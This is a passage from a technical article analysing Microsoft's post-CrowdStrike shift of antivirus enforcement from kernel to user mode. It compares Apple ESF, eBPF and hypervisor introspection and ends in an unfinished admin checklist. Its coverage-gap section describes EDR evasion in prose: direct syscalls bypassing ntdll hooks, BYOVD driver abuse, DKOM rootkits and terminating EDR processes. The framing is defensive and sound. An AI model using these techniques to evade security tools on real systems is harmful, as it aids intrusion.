&lt;p&gt;The most recent Microsoft primary-source document in this article is the November 18, 2025 Windows Experience Blog post [@ms-nov-2025]. Three points in that post matter for the rest of this article. First, &lt;em&gt;&quot;effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners&quot;&lt;/em&gt; -- this sets the formal effective date of MVI 3.0 [@ms-nov-2025]. Second, &lt;em&gt;&quot;in June, we released the first private preview of the Windows endpoint security platform, which shifts AV enforcement from the kernel to user mode&quot;&lt;/em&gt; -- the framing is &lt;em&gt;AV enforcement&lt;/em&gt; generally, not &lt;em&gt;third-party AV enforcement&lt;/em&gt; specifically, which by plain reading commits Defender for Endpoint to the same architectural trajectory as the third-party MVI 3.0 cohort [@ms-nov-2025]. Third, the graphics-driver exemption: &lt;em&gt;&quot;graphics drivers, for example, will continue to run in kernel mode for performance reasons&quot;&lt;/em&gt; [@ms-nov-2025]. That single concession draws the scope of the WRI cleanly: it is an &lt;em&gt;AV enforcement&lt;/em&gt; migration, not a &lt;em&gt;third-party kernel driver elimination&lt;/em&gt; program.&lt;/p&gt;
&lt;h3&gt;Quick Machine Recovery&lt;/h3&gt;
&lt;p&gt;One more piece of the response deserves explicit mention: &lt;em&gt;Quick Machine Recovery&lt;/em&gt; (QMR), the platform-level recovery primitive Microsoft built specifically in response to the on-disk persistence pathology of Channel File 291. QMR is a remote-remediation flow, managed via the Configuration Service Provider model and surfaced as the &lt;em&gt;RemoteRemediation&lt;/em&gt; CSP, that can boot a failing Windows host into a recovery environment and apply targeted fixes without manual safe-mode intervention by an administrator [@mslearn-qmr]. The capability first appeared in Windows Insider builds beginning with Build 26120.4230 on June 2, 2025 [@insider-build-26120-4230]. QMR does not, on its own, prevent another Channel-File-291-class event; it makes the recovery from one orders of magnitude cheaper.&lt;/p&gt;

flowchart LR
    A[&quot;2024-07-19 Channel File 291 outage, 8.5M hosts&quot;] --&amp;gt; B[&quot;2024-07-27 Microsoft secblog publishes WinDBG dump&quot;]
    B --&amp;gt; C[&quot;2024-09-10 WESES summit at Redmond&quot;]
    C --&amp;gt; D[&quot;2024-09-24 House Homeland Security hearing&quot;]
    D --&amp;gt; E[&quot;2024-11-19 Ignite, WRI announced by name&quot;]
    E --&amp;gt; F[&quot;2025-04-01 MVI 3.0 effective&quot;]
    F --&amp;gt; G[&quot;2025-04-03 Ionescu CTIO at CrowdStrike&quot;]
    G --&amp;gt; H[&quot;2025-06-26 WRI detailed rollout, partner cohort&quot;]
    H --&amp;gt; I[&quot;2025-07 private preview to MVI 3.0 partners&quot;]
    I --&amp;gt; J[&quot;2025-11-18 AV enforcement shifts to user mode&quot;]
&lt;p&gt;The U.S.-government context is worth one paragraph of framing. The Government Accountability Office&apos;s GAO-24-107733, the Congressional Research Service&apos;s IF12717 brief, the House Homeland Security Subcommittee hearing on September 24, 2024, the CISA running alert, and the contemporaneous CyberScoop coverage all converge on the same posture: the July 19 outage was a &lt;em&gt;supply-chain and Safe-Deployment-Practices&lt;/em&gt; event, not a cyberattack [@gao-24-107733, @crs-if12717-everycrsreport, @homeland-hearing-page, @govinfo-chrg-118hhrg60030, @meyers-testimony, @cisa-alert-2024-07-19, @cyberscoop-meyers]. The federal response shaped the political environment in which Microsoft chose to announce the WRI; it did not, by itself, design the architecture. The architecture Microsoft picked had been hiding in plain sight for years on two other operating systems, which is the subject of section 7.&lt;/p&gt;
&lt;h2&gt;7. Apple ESF, Linux eBPF, and the Comparative Architecture&lt;/h2&gt;
&lt;p&gt;Microsoft did not invent the architecture it is shipping. Two other major operating systems had already picked a different answer years earlier, in opposite directions, and Microsoft&apos;s own platform team had been quietly experimenting with both for years before committing to one in public. The comparative-architecture frame matters because it tells us what is genuinely novel about the WRI (very little) and what is genuinely novel about the political moment (almost everything).&lt;/p&gt;
&lt;h3&gt;Apple Endpoint Security framework, October 7, 2019&lt;/h3&gt;
&lt;p&gt;On October 7, 2019, with the release of macOS 10.15 Catalina, Apple deprecated third-party kernel extensions for security tools and replaced them with the &lt;em&gt;Endpoint Security framework&lt;/em&gt;, a user-space API for authorization (&lt;code&gt;ES_EVENT_TYPE_AUTH_*&lt;/code&gt;) and notification (&lt;code&gt;ES_EVENT_TYPE_NOTIFY_*&lt;/code&gt;) events fired by the macOS kernel and consumed by Apple-signed user-mode system extensions written by third-party vendors [@apple-esf-docs].&lt;/p&gt;

Apple&apos;s user-space-only API for security tools, introduced with macOS Catalina (10.15) in October 2019 [@apple-esf-docs]. ESF clients run as system extensions in user mode, subscribe to authorization and notification events emitted by the macOS kernel (process creation, file open, network connect, etc.), and may return `ES_AUTH_RESULT_DENY` to block authorization events synchronously. There is no third-party kernel code path; the kernel signals the user-space client, and the user-space client decides.
&lt;p&gt;What makes ESF the cleanest reference point for the WRI is that ESF &lt;em&gt;is&lt;/em&gt; the architecture Microsoft is now shipping under a different label. Both are platform-curated user-mode subscription APIs. Both eliminate third-party kernel drivers from the AV path. Both retain a synchronous authorization gate that lets the vendor&apos;s user-mode code answer &quot;allow or deny&quot; before the operating system completes the operation.&lt;/p&gt;
&lt;p&gt;The September 2024 Sequoia bug -- the natural experiment we met in section 4 -- is the cleanest available test of whether the ESF architecture &lt;em&gt;contains&lt;/em&gt; the blast radius of a 1st-party platform regression. CrowdStrike Falcon for macOS, ESET Endpoint Security, Microsoft Defender for Mac, and SentinelOne all lost network filtering when macOS 15 deprecated the Application Firewall property-list interface [@bleepingcomputer-sequoia, @securityweek-sequoia]. None of them brought down macOS. The hosts kept running. Apple shipped 15.0.1 three weeks later [@techcrunch-sequoia]. The Sequoia outage tested the architecture and the architecture held: feature regression, yes; kernel panic at fleet scale, no.&lt;/p&gt;
&lt;h3&gt;Linux eBPF, and eBPF for Windows&lt;/h3&gt;
&lt;p&gt;The Linux answer to the same question is in a different direction entirely. Linux does not move EDR out of kernel mode; it keeps EDR in kernel mode and proves the in-kernel code safe before executing it. The technology is &lt;em&gt;extended Berkeley Packet Filter&lt;/em&gt; (eBPF), a kernel-resident bytecode virtual machine that runs vendor-supplied probes attached to kernel hook points, with a static verifier that rejects any program whose memory accesses, control flow, or loop bounds cannot be proven safe at load time [@lwn-bounded-loops].&lt;/p&gt;

A Linux kernel subsystem that runs vendor-supplied bytecode programs in kernel context, gated by a static verifier that rejects programs whose memory accesses or control flow cannot be proven safe at load time. eBPF programs attach to hook points (syscall enter/exit, file system events, network packets, tracepoints) and emit data to user space via ring buffers and maps. The Linux EDR industry (Cilium, Tetragon, Falco) is built on eBPF [@lwn-bounded-loops].
&lt;p&gt;The eBPF verifier is non-trivial. Jonathan Corbet&apos;s June 2019 LWN article &lt;em&gt;&quot;BPF and bounded loops&quot;&lt;/em&gt; describes the Linux 5.3 extension that lifted the original verifier&apos;s strict no-loops restriction, permitting bounded loops with statically-determinable trip counts -- enough to write nontrivial in-kernel programs without sacrificing the verifier&apos;s termination guarantee [@lwn-bounded-loops]. Every major Linux EDR product in 2026 ships an eBPF probe set as its primary collection substrate.&lt;/p&gt;
&lt;p&gt;Microsoft has eBPF for Windows. Microsoft has had eBPF for Windows publicly on GitHub since May 2021, ported the PREVAIL verifier as its formal foundation, and continues to develop the project at the same repository [@msft-ebpf-windows, @ebpf-windows-commits].PREVAIL is the academic verifier whose formal soundness arguments are the foundation of eBPF for Windows. Its design takes the same general approach as the Linux verifier -- abstract interpretation over the bytecode&apos;s control flow graph -- and shipped as the open-source verifier Microsoft adopted for the Windows port. Microsoft has shipped eBPF for Windows for networking-centric use cases (XDP-style packet filtering); EDR has not been the primary published use case [@msft-ebpf-windows]. What Microsoft has &lt;em&gt;not&lt;/em&gt; done is make eBPF for Windows the substrate of the WRI&apos;s third-party EDR architecture. The WRI commits to the Apple-style &quot;exit the kernel&quot; answer, not the Linux-style &quot;stay in the kernel but verifier-bounded&quot; answer.&lt;/p&gt;
&lt;h3&gt;The three architectural answers&lt;/h3&gt;
&lt;p&gt;There are exactly three serious architectural answers to the question of where the third-party security observer runs.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Exit the kernel: subscribe from user mode against a platform-curated broker.&lt;/strong&gt; Apple ESF since 2019; Windows endpoint security platform since the July 2025 private preview.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Stay in the kernel, but only as a verifier-bounded extension.&lt;/strong&gt; Linux eBPF; eBPF for Windows since 2021.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operate from below the kernel, in the hypervisor.&lt;/strong&gt; The Garfinkel and Rosenblum NDSS 2003 origin paper on virtual machine introspection [@wiki-vmi], the Xen Project&apos;s VMI APIs [@xen-vmi], Bitdefender&apos;s Hypervisor Introspection product shipped commercially in 2016 [@xen-vmi], and Microsoft&apos;s own in-platform Virtualization-Based Security (VBS), Hypervisor-protected Code Integrity (HVCI), and Secure Kernel features [@mslearn-hvci].&lt;/li&gt;
&lt;/ol&gt;

flowchart TD
    Q[&quot;Where does the third-party security observer run?&quot;]
    Q --&amp;gt; A1[&quot;1. User mode, subscribing via platform broker&quot;]
    Q --&amp;gt; A2[&quot;2. Kernel mode, verifier-bounded extension&quot;]
    Q --&amp;gt; A3[&quot;3. Hypervisor, below the guest kernel&quot;]
    A1 --&amp;gt; A1a[&quot;Apple ESF, since 2019&quot;]
    A1 --&amp;gt; A1b[&quot;Windows endpoint security platform, since 2025&quot;]
    A2 --&amp;gt; A2a[&quot;Linux eBPF&quot;]
    A2 --&amp;gt; A2b[&quot;eBPF for Windows, since 2021&quot;]
    A3 --&amp;gt; A3a[&quot;Bitdefender Hypervisor Introspection, 2016&quot;]
    A3 --&amp;gt; A3b[&quot;Microsoft VBS, HVCI, Secure Kernel&quot;]
&lt;h3&gt;Why Microsoft picked (1) over (2)&lt;/h3&gt;
&lt;p&gt;This is one of the article&apos;s most interesting decisions, and the public reasoning is mostly implicit. The eBPF answer (2) would have required every EDR vendor to rewrite on a substrate they had no muscle memory for. The Linux EDR industry took roughly five years to converge on eBPF as its dominant collection mechanism, and Windows EDR vendors have invested in a different abstraction (kernel callbacks plus minifilters) for twenty-five years. A migration to eBPF for Windows would have meant a multi-year vendor-side rewrite to a verifier whose published EDR-attach-point coverage in mid-2026 was incomplete [@msft-ebpf-windows].&lt;/p&gt;
&lt;p&gt;The Apple-style answer (1), by contrast, lets vendors keep most of their detection logic where it already runs -- in user-mode sensor processes -- and only replaces the Ring-0 collection substrate with a platform broker. The migration is incremental rather than ground-up. And answer (1) carries a second structural advantage: even a perfect eBPF verifier still leaves vendor bytecode running inside the kernel, where a content-validator failure can still produce a runtime fault under a verifier that proved safety at load time. Answer (1) makes the question unaskable by construction: there is no third-party kernel code path, so a third-party content-validator failure cannot crash the kernel.&lt;/p&gt;
&lt;p&gt;Microsoft made a comparative-architecture bet. The bet has a known cost: things a kernel-mode observer can see that a user-mode observer cannot. What exactly does the user-mode EDR lose? That is section 8.&lt;/p&gt;
&lt;h2&gt;8. What User-Mode EDR Cannot See&lt;/h2&gt;
&lt;p&gt;Every architectural choice closes some doors. The user-mode EDR architecture closes the door on Channel-File-291-class reliability incidents -- by construction, a vendor-authored data file consumed by a vendor-authored user-mode process can crash the vendor process, not the host. The same architecture, on its own, opens three coverage doors a kernel-callback EDR closed. This section enumerates them honestly.&lt;/p&gt;
&lt;h3&gt;Gap 1: direct syscall observation&lt;/h3&gt;
&lt;p&gt;A malicious user-mode process can issue x86-64 &lt;code&gt;syscall&lt;/code&gt; instructions directly, bypassing &lt;code&gt;ntdll.dll&lt;/code&gt;&apos;s exported stubs and therefore bypassing any user-mode hook layer that depends on patching those stubs [@mdsec-direct-syscall]. MDSec&apos;s December 2020 write-up &quot;Bypassing user-mode hooks and direct invocation of system calls for red teams&quot; documented the technique in operational detail: an attacker recovers the syscall numbers from a clean copy of &lt;code&gt;ntdll&lt;/code&gt;, emits the &lt;code&gt;syscall&lt;/code&gt; instruction inline in their own payload, and the operating system services the syscall without ever touching the hook layer the EDR vendor injected into &lt;code&gt;ntdll&lt;/code&gt; [@mdsec-direct-syscall]. A user-mode EDR sees only what the platform broker tells it. For the broker to maintain coverage of direct-syscall payloads, the broker itself must be wired into the syscall dispatch path -- the place inside &lt;code&gt;nt!KiSystemServiceCopyArgs&lt;/code&gt; where the kernel dispatches user-mode syscalls -- and emit telemetry for every syscall, not only those that arrive via the &lt;code&gt;ntdll&lt;/code&gt; stubs.&lt;/p&gt;
&lt;p&gt;Microsoft has stated this architecture is in scope but has not published the wire-format detail of the syscall broker as of mid-2026. The honest reading: Microsoft owns this gap, it knows it owns this gap, the EDR partners know Microsoft owns this gap, but the specific shape of the broker&apos;s syscall-path integration has not been publicly documented. Treat any third-party claim about the broker&apos;s syscall-path wire format as speculation.&lt;/p&gt;
&lt;h3&gt;Gap 2: rootkit visibility, and the hypervisor answer&lt;/h3&gt;
&lt;p&gt;A kernel-mode rootkit -- loaded via a Bring-Your-Own-Vulnerable-Driver attack against a signed-but-vulnerable third-party driver -- can hide processes, files, registry keys, and network state from any user-mode observer. The platform broker will emit whatever the &lt;em&gt;kernel&lt;/em&gt; sees about the system state; if the rootkit lies to the kernel via DKOM, the broker will faithfully emit the lie.&lt;/p&gt;

An attack technique in which a malicious user-mode payload loads a signed, legitimately-issued kernel driver that has a known unfixed vulnerability, then exploits the driver&apos;s vulnerability to gain Ring-0 code execution. Because the driver is legitimately signed, neither Windows driver-signing enforcement nor most heuristic load-time defenses block the initial driver load; the attacker gets kernel privilege via a third-party driver they did not have to author or sign themselves.
&lt;p&gt;Microsoft&apos;s stated answer for the rootkit-visibility gap is to layer a generation of &lt;em&gt;hypervisor-assisted memory introspection&lt;/em&gt; below the user-mode EDR. Bitdefender shipped the first commercial Hypervisor Introspection product in 2016 on top of Xen [@xen-vmi]. Academic work has continued: &lt;em&gt;The Reversing Machine&lt;/em&gt; (Karvandi et al., May 2024, arXiv:2405.00298) describes a contemporary research-grade implementation using Intel Mode-Based Execution Control to intercept user-kernel mode transitions and a suspended-process-creation technique to attach hypervisor-based introspection to running guests transparently [@trm-arxiv-2405-00298].&lt;/p&gt;

Microsoft&apos;s family of in-platform virtualization-based security primitives. *Virtualization-Based Security (VBS)* runs a Hyper-V-derived hypervisor below the Windows kernel, creating two virtual trust levels (VTL0 for the normal kernel, VTL1 for the Secure Kernel). *Hypervisor-protected Code Integrity (HVCI)* enforces that kernel-mode pages are either writable or executable but never both, and that only signed code can be loaded into kernel mode; the enforcement runs in the Secure Kernel and cannot be subverted from VTL0 [@mslearn-hvci].
&lt;p&gt;The Microsoft-side equivalent of the Bitdefender HVI architecture is the family of platform features documented under VBS, HVCI, and the Secure Kernel [@mslearn-hvci]. The Secure Kernel is, architecturally, exactly the vantage from which a hypervisor can read guest memory authoritatively and answer questions about kernel state that the guest kernel itself cannot be trusted to answer correctly. Whether the Windows endpoint security platform&apos;s broker will surface that authoritative read to third-party EDR partners -- and through what API -- is part of the not-yet-public detail of the platform.&lt;/p&gt;
&lt;h3&gt;Gap 3: tamper resistance of the EDR process itself&lt;/h3&gt;
&lt;p&gt;A user-mode EDR is a user-mode process. Malware that obtains &lt;code&gt;SeDebugPrivilege&lt;/code&gt; -- usually by abusing a misconfigured service account or a credential-stealing exploit -- can in principle suspend or terminate the EDR process. The Windows mitigation for this class of attack is &lt;em&gt;Protected Process Light&lt;/em&gt; (PPL), the same mechanism Microsoft uses to harden &lt;code&gt;MsMpEng.exe&lt;/code&gt; (the Microsoft Defender Antimalware Service) against tampering by anything short of a kernel-mode attacker. Whether the Windows endpoint security platform&apos;s user-mode EDR processes will get PPL by default in the private preview, and whether they will get a stronger Protected Process classification, is not documented in any primary source as of mid-2026.&lt;/p&gt;
&lt;h3&gt;The BYOVD coverage question, with a dated negative finding&lt;/h3&gt;
&lt;p&gt;The CISA &lt;em&gt;Eviction Strategies Tool&lt;/em&gt; countermeasure CM0058 names the four enforcement substrates that activate Microsoft&apos;s Vulnerable Driver Block List: &lt;em&gt;&quot;Microsoft&apos;s vulnerable driver blocklist is a native utility for Windows 11 2022 and above that receives updates 1-2 times per year... enforced when Hypervisor-protected coded integrity or HVCI, Smart App Control, or S mode is active&quot;&lt;/em&gt; [@cisa-cm0058, @mslearn-driver-block-rules]. The block list itself is a Microsoft-maintained allow-list of &lt;em&gt;non-allowed&lt;/em&gt; kernel drivers -- specifically, the signed-but-vulnerable drivers known to be abused for BYOVD attacks.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Neither CISA&apos;s CM0058 page nor any Microsoft public document publishes aggregate telemetry on what fraction of Windows enterprise endpoints have any of the four enforcement substrates (HVCI, Smart App Control, S Mode, or App Control for Business) active in mid-2026 [@cisa-cm0058]. Microsoft Defender for Endpoint surfaces per-tenant Memory Integrity enablement recommendations; Microsoft has not aggregated those recommendations into a fleet-level statistic. The BYOVD enforcement coverage gap is known qualitatively (the block list exists; enforcement is opt-in via four substrates; updates are infrequent) but cannot be quantified from public evidence.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The kernel attack surface that nothing in user mode can observe&lt;/h3&gt;
&lt;p&gt;Below all of this -- below user-mode EDR, below kernel-mode EDR, below the Secure Kernel -- lies the genuine bottom of the stack: bootkits, System Management Mode resident malware, firmware implants, and pre-boot attacks that compromise the host before any antivirus product has loaded. No user-mode EDR can meaningfully observe any of this. No kernel-mode EDR can fully observe any of this either. The platform answers are Secured-core PC, Microsoft Pluton, and Measured Boot -- platform-curated, Microsoft-owned, hardware-rooted defenses that the third-party industry does not write code inside of. The WRI does not close the firmware gap; it delegates the firmware gap to Microsoft platform features. That delegation is exactly what Microsoft has always wanted (the platform owns the security boundary) and exactly what vendors have always resisted (the platform owns the security boundary). July 19, 2024 is the day vendors stopped publicly resisting.&lt;/p&gt;
&lt;h3&gt;The coverage matrix&lt;/h3&gt;
&lt;p&gt;The coverage tradeoffs in one table. Cells mark the architecture&apos;s native ability to observe each visibility primitive: full coverage, partial coverage, or none.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Visibility primitive&lt;/th&gt;
&lt;th&gt;Kernel-callback EDR&lt;/th&gt;
&lt;th&gt;User-mode EDR + broker&lt;/th&gt;
&lt;th&gt;Hypervisor introspection&lt;/th&gt;
&lt;th&gt;Microsoft platform features&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Direct syscall (no &lt;code&gt;ntdll&lt;/code&gt; stub)&lt;/td&gt;
&lt;td&gt;full (via syscall path hooks)&lt;/td&gt;
&lt;td&gt;partial (depends on broker wire format)&lt;/td&gt;
&lt;td&gt;full (from VTL1)&lt;/td&gt;
&lt;td&gt;full (by construction)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rootkit visibility (DKOM)&lt;/td&gt;
&lt;td&gt;partial (rootkit can subvert peer-driver views)&lt;/td&gt;
&lt;td&gt;none (broker reflects kernel-reported state)&lt;/td&gt;
&lt;td&gt;full (authoritative memory read)&lt;/td&gt;
&lt;td&gt;full (via Secure Kernel)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tamper resistance of the EDR process&lt;/td&gt;
&lt;td&gt;partial (kernel access lets attacker disable peer driver)&lt;/td&gt;
&lt;td&gt;partial (PPL needed)&lt;/td&gt;
&lt;td&gt;full (out of band)&lt;/td&gt;
&lt;td&gt;full (Defender uses PPL today)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BYOVD detection&lt;/td&gt;
&lt;td&gt;partial (post-load only)&lt;/td&gt;
&lt;td&gt;none (vendor cannot reload kernel)&lt;/td&gt;
&lt;td&gt;partial (post-load, via VTL1 inspection)&lt;/td&gt;
&lt;td&gt;full (Vulnerable Driver Block List + HVCI, where enabled)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bootkit, SMM, firmware visibility&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;partial (pre-OS attestation only)&lt;/td&gt;
&lt;td&gt;full (Secured-core PC, Pluton, Measured Boot)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The user-mode EDR architecture closes the reliability problem (a Channel-File-291-class bug crashes a user-mode process, not the kernel). It does not, on its own, close the coverage problem. The coverage problem is being delegated from vendor EDR to Microsoft platform features -- to the Vulnerable Driver Block List, to HVCI, to the Secure Kernel, to Pluton, to Defender&apos;s baseline detection coverage. Whether that delegation reaches Method-A coverage equivalence is the open architectural question of mid-2026, and the honest answer is &quot;we do not yet know.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What else is genuinely open? That is section 9.&lt;/p&gt;
&lt;h2&gt;9. What Is Still Open in mid-2026&lt;/h2&gt;
&lt;p&gt;What does the honest answer look like, twenty-three months after the outage and twelve months after the WRI&apos;s detailed rollout? Several dated negative findings and one positive finding, and the right epistemic posture for reading them is the same posture security engineers should bring to any architectural transition in flight: the absence of an announcement is its own evidence.&lt;/p&gt;
&lt;h3&gt;Has Microsoft committed to a date by which third-party AV kernel drivers will be forbidden?&lt;/h3&gt;
&lt;p&gt;No primary source uses the words &quot;ban&quot; or &quot;deadline&quot; or any equivalent hard-stop phrasing. The November 18, 2025 Microsoft Windows Experience Blog frames the program as an &lt;em&gt;enforcement&lt;/em&gt; migration -- &lt;em&gt;&quot;shifts AV enforcement from the kernel to user mode&quot;&lt;/em&gt; -- and the June 26, 2025 Weston post commits to the private preview as a step in a partner-coordinated journey, not as the first of two phases ending in a third-party kernel-driver lockout [@ms-nov-2025, @weston-2025-06-26]. The article describes the transition as multi-year, partner-coordinated, and without a published hard deadline as of mid-2026. Anyone telling you Microsoft has committed to a date is reading something into the public record that the public record does not contain.&lt;/p&gt;
&lt;h3&gt;Will the WRI user-mode EDR APIs reach feature equivalence with today&apos;s kernel-callback EDR?&lt;/h3&gt;
&lt;p&gt;The on-record partner statements quoted in the June 26, 2025 blog use hedging language: &lt;em&gt;&quot;continue to provide feedback,&quot;&lt;/em&gt; &lt;em&gt;&quot;no degradation in security or performance,&quot;&lt;/em&gt; and similar [@weston-2025-06-26]. That phrasing is not a claim of equivalence achieved; it is a claim of commitment to work toward equivalence. The strongest evidence equivalence is &lt;em&gt;reachable&lt;/em&gt; is Apple&apos;s seven-year ESF deployment: by 2026, every major Windows-side EDR vendor also ships a macOS-side ESF-based product, and the macOS-side product is broadly considered competitive in detection coverage with peer kernel-based products on other platforms. The Windows answer for mid-2026 is empirically unknown -- the API surface is in active evolution, and the partner cohort is still inside the private preview.&lt;/p&gt;
&lt;h3&gt;Has any MVI 3.0 deployment ring actually halted a vendor content update since June 26, 2025?&lt;/h3&gt;
&lt;p&gt;This is the most important operational question and the one with the most honest negative answer. No public primary source documents either a ring stop-gate event (an MVI 3.0 partner caught a latent Channel-File-291-class bug at a canary ring and halted the rollout before fleet propagation) &lt;em&gt;or&lt;/em&gt; a ring-escape incident (a latent bug got through the rings and produced a fleet event) from any of the eight named MVI 3.0 partners through the most recent search horizon. The SentinelOne May 29, 2025 cloud control-plane outage [@sentinelone-may-29-rca] is structurally orthogonal to the failure mode the rings are designed to catch -- per SentinelOne&apos;s own RCA, &lt;em&gt;&quot;a software flaw in an outgoing infrastructure control system triggered an automatic function that removed critical network routes&quot;&lt;/em&gt; and &lt;em&gt;&quot;customer endpoints remained protected&quot;&lt;/em&gt; throughout -- so it does not stress-test the rings. The honest framing has two competing readings: the rings are working silently, or the rings have not yet been stress-tested by a Channel-File-291-class latent bug in any partner&apos;s content pipeline. Neither reading can be discriminated from current public evidence.The SentinelOne May 29, 2025 event is the closest post-WRI partner-side reliability incident on the public record, and it is worth a paragraph of distinction. The failure was a cloud control-plane network-routes deletion that knocked SentinelOne&apos;s customer-facing management console offline; per the company&apos;s own RCA, customer endpoints remained protected throughout, federal environments were not impacted, and no endpoint content update was involved [@sentinelone-may-29-rca]. The event is exactly the kind of reliability incident the MVI 3.0 rings are &lt;em&gt;not&lt;/em&gt; designed to catch -- the rings address Safe Deployment Practices for sensor and content updates, not cloud control-plane reliability.&lt;/p&gt;
&lt;h3&gt;Will Microsoft hold itself to the same kernel-out standard as MVI partners?&lt;/h3&gt;
&lt;p&gt;The November 18, 2025 Microsoft Windows Experience Blog uses the framing &lt;em&gt;&quot;AV enforcement&quot;&lt;/em&gt; (not &lt;em&gt;&quot;third-party AV enforcement&quot;&lt;/em&gt;) -- by plain reading this commits Microsoft Defender for Endpoint to the same trajectory as the third-party MVI 3.0 cohort [@ms-nov-2025]. The article notes this as the closest available public Defender-kernel-out signal, while being honest that no Defender-specific GA date for the user-mode migration has been published. The same November 18 post explicitly carves out the graphics-driver exemption [@ms-nov-2025] -- which by plain reading means that &lt;em&gt;non-AV&lt;/em&gt; third-party kernel drivers will continue to ship under the existing model. The WRI is, narrowly, an AV-enforcement migration.&lt;/p&gt;

In June, we released the first private preview of the Windows endpoint security platform, which shifts AV enforcement from the kernel to user mode... Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft Windows Experience Blog, November 18, 2025 [@ms-nov-2025]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The MVI 3.0 ring question -- has any partner actually halted a rollout at a ring boundary since June 26, 2025? -- admits two readings from current evidence. Reading one: the rings are working silently, catching latent bugs that never become public, because the entire point of a working ring is that nothing happens. Reading two: the rings have not yet been stress-tested by a Channel-File-291-class latent bug at any partner. Both readings are consistent with the dated negative finding &quot;no public stop-gate event has been documented.&quot; Anyone telling you they know which reading is right is overclaiming. The right epistemic posture is to keep watching, and to read partner-side RCAs as they appear.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;What fraction of enterprise Windows endpoints enforces the Vulnerable Driver Block List?&lt;/h3&gt;
&lt;p&gt;The CISA CM0058 page is the canonical document and it publishes no enablement telemetry [@cisa-cm0058]. Microsoft&apos;s own documentation for the block list publishes update cadence (one to two times per year) and a per-substrate description of where the block list activates (HVCI, Smart App Control, S Mode, or App Control for Business) but no aggregate fleet-level enablement statistic [@mslearn-driver-block-rules, @cisa-cm0058]. Microsoft Defender for Endpoint surfaces per-tenant Memory Integrity enablement recommendations but does not aggregate. The BYOVD enforcement gap is known qualitatively and cannot be quantified from public evidence as of mid-2026. Anyone publishing a percentage figure for HVCI enablement across the global Windows enterprise fleet is publishing a guess.&lt;/p&gt;
&lt;p&gt;These are five open questions with five honest answers. The reader leaves section 9 knowing not the answers, but the &lt;em&gt;shape&lt;/em&gt; of the questions -- which is the right epistemic state in which to read the practical guide that follows. What should you do, mid-2026, with this knowledge? That is section 10.&lt;/p&gt;
&lt;h2&gt;10. Practical Guide for mid-2026&lt;/h2&gt;
&lt;p&gt;Three audiences, three different sets of next moves. The article has been writing for these three audiences since the first paragraph -- the Windows enterprise administrator, the security-product architect, and the incident responder -- and each gets a short, concrete checklist that respects the open architectural questions of section 9.&lt;/p&gt;
&lt;h3&gt;For the Windows enterprise administrator&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Treat your antivirus and EDR vendor&apos;s update cadence as part of your fleet&apos;s blast radius. The cadence of vendor content updates is, in mid-2026, &lt;em&gt;the&lt;/em&gt; operational variable most likely to produce your next mass-availability incident. Ask your vendor for their MVI 3.0 documentation and verify they are running staged deployment rings rather than gating only at a single global GA promote [@mslearn-mvi, @weston-2025-06-26].&lt;/li&gt;
&lt;li&gt;Enable &lt;em&gt;Quick Machine Recovery&lt;/em&gt; on Windows 11 24H2 and later [@mslearn-qmr]. QMR is the platform-level recovery primitive Microsoft built specifically for Channel-File-291-style on-disk persistence pathology, and it materially reduces recovery time for any future event that produces unbootable hosts at scale [@insider-build-26120-4230].&lt;/li&gt;
&lt;li&gt;Enable HVCI / Memory Integrity wherever your hardware supports it [@mslearn-hvci]. HVCI is one of the four substrates that activates Microsoft&apos;s Vulnerable Driver Block List, and enabling it brings the BYOVD blocklist from a published-but-inert resource to an enforced runtime control on your endpoints [@mslearn-driver-block-rules, @cisa-cm0058].&lt;/li&gt;
&lt;li&gt;If your fleet still depends on a kernel-only AV stack, push your vendor for their Method-C (user-mode) roadmap commitments. The MVI 3.0 partner cohort named in Weston&apos;s June 26, 2025 post is the right reference list: vendors not on it have not made a public commitment of equivalent specificity, and that should affect your procurement calculus [@weston-2025-06-26].&lt;/li&gt;
&lt;li&gt;Audit your Defender exclusion list. The principle of least privilege applies to your AV configuration just as much as to your user accounts -- every exclusion is a path past your detection coverage, and Defender exclusions inherited from 2018 deployments are a routine finding in modern enterprise audits.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;For the security-product architect&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Apply for MVI 3.0 partnership and request access to the Windows endpoint security platform private preview now [@mslearn-mvi]. The API surface is in active evolution and partner feedback is materially shaping the contract. Vendors who wait for GA will inherit a contract written by competitors.&lt;/li&gt;
&lt;li&gt;Plan a migration roadmap from kernel callbacks (Method A) to user-mode subscription (Method C). Assume Method A remains the bridge for several more years and that a hybrid Method-A-plus-Method-C deployment will be your production reality through at least the late 2020s. Engineer for Method C as the &lt;em&gt;future-primary&lt;/em&gt; substrate while Method A continues to carry production detection coverage.&lt;/li&gt;
